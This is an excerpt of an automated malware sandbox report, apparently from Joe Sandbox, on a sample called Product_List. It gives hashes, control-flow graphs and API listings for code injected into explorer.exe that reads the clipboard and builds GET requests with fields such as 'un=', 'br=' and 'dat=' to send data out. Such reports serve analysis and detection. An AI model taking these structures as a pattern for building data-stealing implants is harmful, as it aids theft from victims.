                                                      Function 017A9A10 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6223b96527eb8d9265ccc7a2495ca635bbbcf137dd85ed0d297199b583e9da5d
                                                      • Instruction ID: 898951479da02bc0a39bc9b9721b17c716ac0334a8399303c0d191012f1a1a62
                                                      • Opcode Fuzzy Hash: 6223b96527eb8d9265ccc7a2495ca635bbbcf137dd85ed0d297199b583e9da5d
                                                      • Instruction Fuzzy Hash: 0B90027120540407D150619988487874005E7D4346F51C031A5154555EC7A5D8917571
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017A9A80 Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 894e9f65207c1062dc3fcdcf2928c18983bafe902700585a984fb2204c98f2c7
                                                      • Instruction ID: 8d20d01cc6d8305dd8451528fba335dae160f5d1f68c7dba2e5945da60b46e2f
                                                      • Opcode Fuzzy Hash: 894e9f65207c1062dc3fcdcf2928c18983bafe902700585a984fb2204c98f2c7
                                                      • Instruction Fuzzy Hash: 4E90026120544447D19062998844B4F8105E7E5246F91C039A4146554CCA5598557761
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017FFDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 53%
                                                      			E017FFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = L017ACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				L017F5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return L017F5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                      0x017ffdda
                                                      0x017ffde2
                                                      0x017ffde5
                                                      0x017ffdec
                                                      0x017ffdfa
                                                      0x017ffdff
                                                      0x017ffe0a
                                                      0x017ffe0f
                                                      0x017ffe17
                                                      0x017ffe1e
                                                      0x017ffe19
                                                      0x017ffe19
                                                      0x017ffe19
                                                      0x017ffe20
                                                      0x017ffe21
                                                      0x017ffe22
                                                      0x017ffe25
                                                      0x017ffe40

                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017FFDFA
                                                      Strings
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017FFE2B
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017FFE01
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                      • API String ID: 885266447-3903918235
                                                      • Opcode ID: 7fd9bd7a62bc838d41190bb8b4fddf0ba018e8612cc5d0d4c32e57ec33844e85
                                                      • Instruction ID: e2a0f2a4d97c8fc8fdef7844a76bbb60c49365318a6e4cefd9712b8535eedf72
                                                      • Opcode Fuzzy Hash: 7fd9bd7a62bc838d41190bb8b4fddf0ba018e8612cc5d0d4c32e57ec33844e85
                                                      • Instruction Fuzzy Hash: 21F0F673640602BFE7201A45DC06F23FF5AEB44B30F140318F728562E1EAA2F82086F0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:3.7%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:17.2%
                                                      Total number of Nodes:128
                                                      Total number of Limit Nodes:11
                                                      execution_graph 8455 e075045 8456 e075057 8455->8456 8459 e074ee2 8456->8459 8458 e07505c 8460 e074102 CreateThread 8459->8460 8461 e074ef7 8460->8461 8461->8458 8444 e074ee2 8447 e074102 8444->8447 8446 e074ef7 8448 e07410b 8447->8448 8450 e074110 8448->8450 8451 e06b692 8448->8451 8450->8446 8452 e06b6a9 8451->8452 8453 e06b6f9 8452->8453 8454 e06b6d3 CreateThread 8452->8454 8453->8450 8454->8450 8475 e06d2ce 8476 e06d2e4 8475->8476 8483 e06efa2 8476->8483 8479 e06b3f2 10 API calls 8481 e06d2f4 8479->8481 8480 e06d370 8481->8480 8489 e06b4e2 8481->8489 8484 e06efe7 8483->8484 8497 e06ee52 8484->8497 8486 e06f125 8501 e06ff62 8486->8501 8488 e06d2ec 8488->8479 8490 e06b587 8489->8490 8491 e06b4ff 8489->8491 8490->8481 8491->8490 8492 e06ce12 OpenClipboard 8491->8492 8493 e06b577 8492->8493 8494 e0724a2 11 API calls 8493->8494 8495 e06b57f 8494->8495 8496 e06b3f2 10 API calls 8495->8496 8496->8490 8498 e06ee7e 8497->8498 8499 e06e462 ObtainUserAgentString 8498->8499 8500 e06ee8b 8499->8500 8500->8486 8502 e06ffc5 WSAStartup 8501->8502 8503 e06ff9d 8501->8503 8502->8488 8503->8502 8466 e06b68f 8467 e06b6a9 8466->8467 8468 e06b6f9 8467->8468 8469 e06b6d3 CreateThread 8467->8469 8462 e075069 8463 e07506e 8462->8463 8464 e074ee2 CreateThread 8463->8464 8465 e075073 8464->8465 8520 e06b3e9 8521 e06b4a9 8520->8521 8522 e06b40b 8520->8522 8523 e0734e2 10 API calls 8522->8523 8523->8521 8508 e0700f6 8509 e07015f closesocket 8508->8509 8510 e0700fe 8508->8510 8510->8509 8511 e06ff57 8512 e06ffc5 WSAStartup 8511->8512 8513 e06ff9d 8511->8513 8513->8512 8504 e06b4d5 8505 e06b497 8504->8505 8506 e0734e2 10 API calls 8505->8506 8507 e06b4a9 8506->8507 8374 e06ee52 8375 e06ee7e 8374->8375 8378 e06e462 8375->8378 8377 e06ee8b 8379 e06e4d4 8378->8379 8380 e06e54f 8379->8380 8381 e06e53e ObtainUserAgentString 8379->8381 8380->8377 8381->8380 8385 e06b592 8386 e06b5b3 8385->8386 8387 e06b678 8386->8387 8388 e06b5e2 SleepEx 8386->8388 8392 e06ce12 8386->8392 8396 e0724a2 8386->8396 8401 e06b3f2 8386->8401 8388->8386 8388->8388 8393 e06ce2b 8392->8393 8395 e06ce6f 8392->8395 8394 e06ce67 OpenClipboard 8393->8394 8393->8395 8394->8395 8395->8386 8398 e0724d9 8396->8398 8397 e072568 8397->8386 8397->8397 8398->8397 8400 e072551 SleepEx 8398->8400 8405 e0734e2 8398->8405 8400->8398 8402 e06b40b 8401->8402 8404 e06b4a9 8401->8404 8403 e0734e2 10 API calls 8402->8403 8403->8404 8404->8386 8407 e07351c 8405->8407 8406 e073b67 8406->8398 8407->8406 8408 e0735e6 8407->8408 8428 e06fed2 8407->8428 8408->8406 8411 e073680 getaddrinfo 8408->8411 8412 e0736a7 8408->8412 8411->8412 8412->8406 8426 e073726 8412->8426 8431 e070072 8412->8431 8413 e073b37 8434 e06fd02 8413->8434 8416 e073cfb 8419 e073d1c SleepEx 8416->8419 8421 e073d28 8416->8421 8420 e073e48 8419->8420 8422 e070102 closesocket 8420->8422 8421->8420 8423 e073dad setsockopt recv 8421->8423 8422->8406 8423->8420 8424 e073e0a 8423->8424 8424->8420 8425 e073e13 recv 8424->8425 8425->8420 8425->8424 8426->8406 8426->8413 8427 e073c88 8426->8427 8438 e06ffe2 8427->8438 8429 e06ff34 socket 8428->8429 8430 e06ff0c 8428->8430 8429->8408 8430->8429 8432 e0700d2 connect 8431->8432 8433 e0700aa 8431->8433 8432->8426 8433->8432 8436 e06fd3b 8434->8436 8435 e06fe45 8441 e070102 8435->8441 8436->8435 8437 e06fe3e SleepEx 8436->8437 8437->8435 8439 e07003f send 8438->8439 8440 e070017 8438->8440 8439->8416 8440->8439 8442 e070134 8441->8442 8443 e07015f closesocket 8442->8443 8443->8406 8514 e06ef9e 8515 e06efa2 8514->8515 8516 e06ee52 ObtainUserAgentString 8515->8516 8517 e06f125 8516->8517 8518 e06ff62 WSAStartup 8517->8518 8519 e06fb75 8518->8519 8470 e07249b 8472 e07249f 8470->8472 8471 e0734e2 10 API calls 8471->8472 8472->8471 8473 e072551 SleepEx 8472->8473 8474 e072463 8472->8474 8473->8472

                                                      Executed Functions

                                                      Function 0E0734E2 Relevance: 27.1, APIs: 5, Strings: 10, Instructions: 830networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 e0734e2-e07351a 1 e07351c-e073520 0->1 2 e07353a-e07353d 0->2 1->2 5 e073522-e073526 1->5 3 e073b95-e073ba2 2->3 4 e073543-e073549 2->4 4->3 6 e07354f-e073563 4->6 5->2 7 e073528-e07352c 5->7 8 e073565-e073569 6->8 9 e07356b-e07356c 6->9 7->2 10 e07352e-e073532 7->10 8->9 11 e073576-e07357f 8->11 9->11 10->2 12 e073534-e073538 10->12 13 e073596-e07359a 11->13 14 e073581-e073585 11->14 12->2 12->4 16 e0735a2-e0735c5 13->16 17 e07359c 13->17 15 e073587-e073594 14->15 14->16 15->17 18 e0735c7-e0735cb 16->18 19 e0735cd-e0735e1 call e06fed2 16->19 17->16 18->19 20 e073609-e07360d 18->20 22 e0735e6-e073603 19->22 23 e0736b7-e0736c4 20->23 24 e073613-e07361b 20->24 22->20 27 e073b85-e073b8e 22->27 23->27 28 e0736ca-e0736da 23->28 25 e07361d-e073645 call e06b012 call e072ea2 24->25 26 e07364b-e07365e 24->26 25->26 26->27 30 e073664-e07366a 26->30 27->3 31 e0736f4-e073706 28->31 32 e0736dc-e0736ed call e06fe62 28->32 30->27 36 e073670-e073672 30->36 33 e073763-e073788 31->33 34 e073708-e073721 call e070072 31->34 32->31 40 e0737a7-e0737ab 33->40 41 e07378a-e0737a5 call e0742f2 33->41 44 e073726-e07374e 34->44 36->27 42 e073678-e07367a 36->42 48 e073b75-e073b76 40->48 49 e0737b1-e0737b5 40->49 56 e0737ef call e0742f2 41->56 42->27 47 e073680-e0736a5 getaddrinfo 42->47 44->33 51 e073750-e073759 44->51 47->23 53 e0736a7-e0736af 47->53 50 e073b7d-e073b7e 48->50 49->48 54 e0737bb-e0737bf 49->54 50->27 51->50 55 e07375f 51->55 53->23 57 e0737c7-e0737ed call e0742f2 54->57 58 e0737c1-e0737c5 54->58 55->33 60 e0737f4-e0738a0 call e0742c2 call e071392 call e071382 * 2 call e0742c2 call e0707c2 call e0744e2 56->60 57->56 58->57 58->60 77 e0738b4-e073914 call e0742f2 60->77 78 e0738a2-e0738a6 60->78 83 e073a03-e073af0 call e0742c2 call e074772 * 4 call e0744e2 * 2 call e071382 * 2 77->83 84 e07391a-e07395b call e0742c2 call e074772 call e0744e2 77->84 78->77 79 e0738a8-e0738af call e070cc2 78->79 79->77 116 e073af5-e073b16 call e074772 83->116 98 e07395d-e073974 call e074772 call e0744e2 84->98 99 e073978-e0739a9 call e074772 * 2 84->99 98->99 112 e0739d1-e0739d5 99->112 113 e0739ab-e0739cc call e0744e2 call e074772 99->113 112->116 117 e0739db-e0739fe call e074772 112->117 113->112 127 e073ba3-e073c82 call e074772 * 7 call e0744e2 call e0742c2 call e0744e2 call e0707c2 call e070cc2 116->127 128 e073b1c-e073b31 call e074772 call e0744e2 116->128 117->116 141 e073b37-e073b4a call e06fd02 127->141 188 e073c88-e073c8f 127->188 128->141 142 e073cd4-e073cfd call e06ffe2 128->142 148 e073b4f-e073b71 call e070102 141->148 150 e073cff-e073d14 142->150 151 e073d28-e073d2c 142->151 148->48 150->151 154 e073d16-e073d1a 150->154 155 e073d40-e073d54 151->155 156 e073d2e-e073d32 151->156 154->151 161 e073d1c-e073d23 SleepEx 154->161 158 e073d56-e073d6c 155->158 159 e073d72-e073e08 call e0742f2 call e0742c2 setsockopt recv 155->159 162 e073e5f-e073e95 call e070102 156->162 163 e073d38-e073d3a 156->163 158->159 158->162 175 e073e0a 159->175 176 e073e48-e073e55 159->176 161->162 162->48 163->155 163->162 175->176 178 e073e0c-e073e11 175->178 176->162 178->176 180 e073e13-e073e46 recv 178->180 180->175 180->176 189 e073c91-e073c98 188->189 190 e073cb9-e073cc4 188->190 191 e073cb0-e073cb7 189->191 192 e073c9a-e073ca6 189->192 190->142 193 e073cc6-e073cce 190->193 191->190 194 e073cd0-e073cd1 191->194 192->191 193->142 194->142
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825175140.000000000E060000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E060000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_e060000_explorer.jbxd
                                                      Similarity
                                                      • API ID: recv$Sleepgetaddrinfosetsockopt
                                                      • String ID: Co$&br=$&un=$&wn=$: cl$GET $dat=$nnec$ose$tion
                                                      • API String ID: 878647675-2045366144
                                                      • Opcode ID: 09b6abc1e30e59ec9e3b6a0e4e5670d4d368abcecd38103a8d1d95bd4df3e060
                                                      • Instruction ID: 660ea973a7910fa01d0c3e486c4a30fd96c0ca3c996686abb2b1b9ea5c1bd0f9
                                                      • Opcode Fuzzy Hash: 09b6abc1e30e59ec9e3b6a0e4e5670d4d368abcecd38103a8d1d95bd4df3e060
                                                      • Instruction Fuzzy Hash: 8652C230618A088BDB69EF68D494BEEB3E1FB94304F504A2ED4DBC7145EF34A846D785
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0E06CE12 Relevance: 1.6, APIs: 1, Instructions: 63clipboardCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 351 e06ce12-e06ce25 352 e06ceb4-e06ceb9 351->352 353 e06ce2b-e06ce33 351->353 353->352 354 e06ce35-e06ce3d 353->354 354->352 355 e06ce3f-e06ce47 354->355 355->352 356 e06ce49-e06ce51 355->356 356->352 357 e06ce53-e06ce5b 356->357 357->352 358 e06ce5d-e06ce65 357->358 358->352 359 e06ce67-e06ce6d OpenClipboard 358->359 359->352 360 e06ce6f-e06ce85 359->360 362 e06ce87-e06ce93 360->362 363 e06cea9-e06ceb0 360->363 362->363 366 e06ce95-e06cea1 call e06cbf2 362->366 363->352 366->363
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825175140.000000000E060000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E060000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_e060000_explorer.jbxd
                                                      Similarity
                                                      • API ID: ClipboardOpen
                                                      • String ID:
                                                      • API String ID: 2793039342-0
                                                      • Opcode ID: 4f579f839b6e29423764fa7d12fda6378e6272ab4379db70fd490c303461b27f
                                                      • Instruction ID: b122f857d095f82174a61587d7f49d8ed0a2e9c0f2d5508c6db9d82fb7bb29f2
                                                      • Opcode Fuzzy Hash: 4f579f839b6e29423764fa7d12fda6378e6272ab4379db70fd490c303461b27f
                                                      • Instruction Fuzzy Hash: EE11123021090A8FFBA5AB6884EC3B9B1E1FB48245F5804BA955ACB199DF76CC82C751
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0E06E462 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 104COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • ObtainUserAgentString.URLMON(?,?,?,?,?,?,?,?,?,?,0E06EE8B), ref: 0E06E549
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825175140.000000000E060000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E060000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_e060000_explorer.jbxd
                                                      Similarity
                                                      • API ID: AgentObtainStringUser
                                                      • String ID: -Age$User$nt: $on.d$urlm
                                                      • API String ID: 2681117516-1987325725
                                                      • Opcode ID: 8e9652e3147b6c8586b737b101cb5b85868f5ee2c2efdf647ebb5e9b2206844b
                                                      • Instruction ID: 789a9c38ff66e4f419078d0c9032071681edeb07545378e908ec68d87aa439dd
                                                      • Opcode Fuzzy Hash: 8e9652e3147b6c8586b737b101cb5b85868f5ee2c2efdf647ebb5e9b2206844b
                                                      • Instruction Fuzzy Hash: 5131E331B14A4C8BCF15EFA8C8943EEBBE1FF58204F40462AD45ED7240EF788A458789
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0E0700F6 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 215 e0700f6-e0700fc 216 e07015f-e070171 closesocket 215->216 217 e0700fe-e070132 215->217 218 e070134-e070158 call e072ea2 217->218 219 e07015e 217->219 218->219 219->216
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825175140.000000000E060000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E060000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_e060000_explorer.jbxd
                                                      Similarity
                                                      • API ID: closesocket
                                                      • String ID: clos$esoc$ket
                                                      • API String ID: 2781271927-3604069445
                                                      • Opcode ID: c607b59eec15e390d056f957e0fddbfb36613024b1972e8a282fbb475563cd37
                                                      • Instruction ID: d5c7f9cc0bd58b1a6d4dbf2e14f4ea5879a1d35aaee1d3a13218f4ec3a117060
                                                      • Opcode Fuzzy Hash: c607b59eec15e390d056f957e0fddbfb36613024b1972e8a282fbb475563cd37
                                                      • Instruction Fuzzy Hash: 65F0FF70A0CB084FCB80EF08C4C47A9B7E0FB88340F505A3CE88ECB249C3B488428B46
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0E070102 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 222 e070102-e070132 223 e070134-e070158 call e072ea2 222->223 224 e07015e-e070171 closesocket 222->224 223->224
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825175140.000000000E060000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E060000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_e060000_explorer.jbxd
                                                      Similarity
                                                      • API ID: closesocket
                                                      • String ID: clos$esoc$ket
                                                      • API String ID: 2781271927-3604069445
                                                      • Opcode ID: 157b2a73580cb39ea934c9d9af0ae9cf0488c210d458c1b6609698e727620e8b
                                                      • Instruction ID: ee5fe5edc1a22449a9a7c84e802218af0b7a68336c90f4e7de1635adb14e26ba
                                                      • Opcode Fuzzy Hash: 157b2a73580cb39ea934c9d9af0ae9cf0488c210d458c1b6609698e727620e8b
                                                      • Instruction Fuzzy Hash: 09F06D7051CB089FCB84EF18D0C87A9B6E0FB99354F545A7DA88ECB248C7B489858B46
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0E070072 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 228 e070072-e0700a8 229 e0700d2-e0700f5 connect 228->229 230 e0700aa-e0700cc call e072ea2 228->230 230->229
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825175140.000000000E060000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E060000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_e060000_explorer.jbxd
                                                      Similarity
                                                      • API ID: connect
                                                      • String ID: conn$ect
                                                      • API String ID: 1959786783-716201944
                                                      • Opcode ID: 1a507fdb9235a7ee1dc472fbd06ba90b857d4c9ebcbd8217e3d10fd5549f7b44
                                                      • Instruction ID: 3cd6d7917d6eb449c768915a26edd9a9d22613f321ee24cf240c0402854c66a6
                                                      • Opcode Fuzzy Hash: 1a507fdb9235a7ee1dc472fbd06ba90b857d4c9ebcbd8217e3d10fd5549f7b44
                                                      • Instruction Fuzzy Hash: DF01217065CA088FDB84EF5CD088B55B7E0FBA8310F1542BE994DDB266C774CD458B81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0E06FF57 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 233 e06ff57-e06ff9b 234 e06ffc5-e06ffe0 WSAStartup 233->234 235 e06ff9d-e06ffbf call e072ea2 233->235 235->234
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825175140.000000000E060000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E060000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_e060000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Startup
                                                      • String ID: WSAS$tart
                                                      • API String ID: 724789610-2426239465
                                                      • Opcode ID: 5d4eedd47669bb22885a1e9d025f91cf41a4c1660d86c5920e5b61ea27db5eea
                                                      • Instruction ID: 989de7eb79d717f503e60b7a20bda73bf849b3344611e81a4281ab163fceab02
                                                      • Opcode Fuzzy Hash: 5d4eedd47669bb22885a1e9d025f91cf41a4c1660d86c5920e5b61ea27db5eea
                                                      • Instruction Fuzzy Hash: F0017170559A088FDB80DF18D08876AF7E0EB68351F2441AAD409DB26AC774C9868B96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0E06FF62 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 238 e06ff62-e06ff9b 239 e06ffc5-e06ffe0 WSAStartup 238->239 240 e06ff9d-e06ffbf call e072ea2 238->240 240->239
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825175140.000000000E060000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E060000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_e060000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Startup
                                                      • String ID: WSAS$tart
                                                      • API String ID: 724789610-2426239465
                                                      • Opcode ID: c70ac3622655db380e7166c5473ec9c2b67cba5047049d587f5892ecd52655b5
                                                      • Instruction ID: 50292a94d062ed07fc448c877c882dbd9f30d00c842b5d9c49ac190297b7d2d3
                                                      • Opcode Fuzzy Hash: c70ac3622655db380e7166c5473ec9c2b67cba5047049d587f5892ecd52655b5
                                                      • Instruction Fuzzy Hash: F3016270509A088FDB84DF1DD08C76AF7E0FB58351F2441AAD40DDF26AC7B4C9858B96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0E06FFE2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 243 e06ffe2-e070015 244 e070017-e070039 call e072ea2 243->244 245 e07003f-e070067 send 243->245 244->245
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825175140.000000000E060000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E060000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_e060000_explorer.jbxd
                                                      Similarity
                                                      • API ID: send
                                                      • String ID: send
                                                      • API String ID: 2809346765-2809346765
                                                      • Opcode ID: 2df83b899bb07ceedbe8ec300ca63b74f3b1a198a09eab30d0a1de18c6e5a642
                                                      • Instruction ID: 8fcd99c884be7472af9d8a0c3ad46309b620f03c46c82a304a68aa5b178a3ce3
                                                      • Opcode Fuzzy Hash: 2df83b899bb07ceedbe8ec300ca63b74f3b1a198a09eab30d0a1de18c6e5a642
                                                      • Instruction Fuzzy Hash: 3E01523051CA4C8FDB84EF5CE088B25B7E0FBA8324F1541AE984DCB266D774D8418B81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0E06FED2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 248 e06fed2-e06ff0a 249 e06ff34-e06ff55 socket 248->249 250 e06ff0c-e06ff2e call e072ea2 248->250 250->249
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825175140.000000000E060000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E060000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_e060000_explorer.jbxd
                                                      Similarity
                                                      • API ID: socket
                                                      • String ID: sock
                                                      • API String ID: 98920635-2415254727
                                                      • Opcode ID: 4367b077762023a970a3942566c5a4b0007476500bff43da2781850560e372b2
                                                      • Instruction ID: 67879fa56cbbe5a045bb07edcb06d5bca3765561fd59093c0dc792b75218d562
                                                      • Opcode Fuzzy Hash: 4367b077762023a970a3942566c5a4b0007476500bff43da2781850560e372b2
                                                      • Instruction Fuzzy Hash: 5A01717091C6088FDB84EF5CD088B15BBE0FB58314F1541BDD84DCB266C774C9858B85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0E0724A2 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 253 e0724a2-e0724d6 254 e0724d9-e0724dd 253->254 255 e0724df-e0724e2 254->255 256 e072559-e072562 254->256 255->256 257 e0724e4-e0724eb 255->257 256->254 258 e072568-e072571 256->258 259 e0724f5-e07254f call e0742c2 call e0734e2 257->259 260 e0724f0 call e0742f2 257->260 261 e072573-e07257a 258->261 262 e0725aa-e0725c6 258->262 259->256 273 e072551-e072557 SleepEx 259->273 260->259 264 e07258f-e072598 261->264 265 e07257c-e07257d 261->265 264->262 267 e07259a-e0725a1 264->267 266 e072583-e07258d 265->266 266->264 266->266 267->262 269 e0725a3-e0725a4 267->269 269->262 273->256
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825175140.000000000E060000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E060000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_e060000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: b49e5f8e5e3bc2a4cfbc32b960a6aedb5eac49f772a256d174028e4304545fa2
                                                      • Instruction ID: b1bdafbf7543d541af32c99197dedea885bb7d2cdb115c9a0ab38ed9ec518121
                                                      • Opcode Fuzzy Hash: b49e5f8e5e3bc2a4cfbc32b960a6aedb5eac49f772a256d174028e4304545fa2
                                                      • Instruction Fuzzy Hash: 8C31F47091CB488FDB29CF0CD8866A973E0FB95710F50461ED8CA87125EA70AD468BD6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0E06FD02 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 274 e06fd02-e06fd39 275 e06fd4b-e06fd52 274->275 276 e06fd3b-e06fd42 274->276 278 e06fd58-e06fe3c call e0742c2 * 2 call e0744e2 call e0742c2 call e0744e2 call e0742c2 * 2 275->278 279 e06fe45-e06fe5f 275->279 277 e06fd44 276->277 276->278 277->275 278->279 294 e06fe3e-e06fe43 SleepEx 278->294 294->279
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.825175140.000000000E060000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E060000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_e060000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
